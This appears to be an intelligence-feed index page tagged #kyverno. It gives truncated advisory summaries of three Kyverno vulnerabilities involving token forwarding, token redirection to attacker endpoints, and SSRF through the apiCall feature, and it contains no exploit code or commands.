This page collects WhisperX intelligence signals tagged #kyverno. It is designed for humans, search engines, and AI agents: each item links to a canonical source-backed record with sector, source, timestamp, credibility, and exportable structured data.
A high-severity vulnerability in Kyverno's policy engine allows ServiceAccount tokens to be automatically forwarded to external endpoints without policy authors' knowledge or consent. The flaw, tracked as GHSA-8wfp-579w-6r25, stems from an insecure-by-default behavior in Kyverno's apiCall service mode, where the admiss...
A high-severity vulnerability in Kyverno, tracked as CVE-2026-40868, allows policy-controlled manipulation to redirect the Kubernetes controller service account token to attacker-controlled endpoints, enabling a classic confused deputy attack. The flaw exists in the apiCall servicecall helper, which implicitly injects ...
A critical Server-Side Request Forgery (SSRF) vulnerability in Kyverno's APICall feature allows users with Policy creation permissions to pivot from low-privilege namespace access into high-value internal targets, effectively dismantling tenant isolation in shared Kubernetes clusters. Tracked as GHSA-fmqp-4wfc-w3v7 and...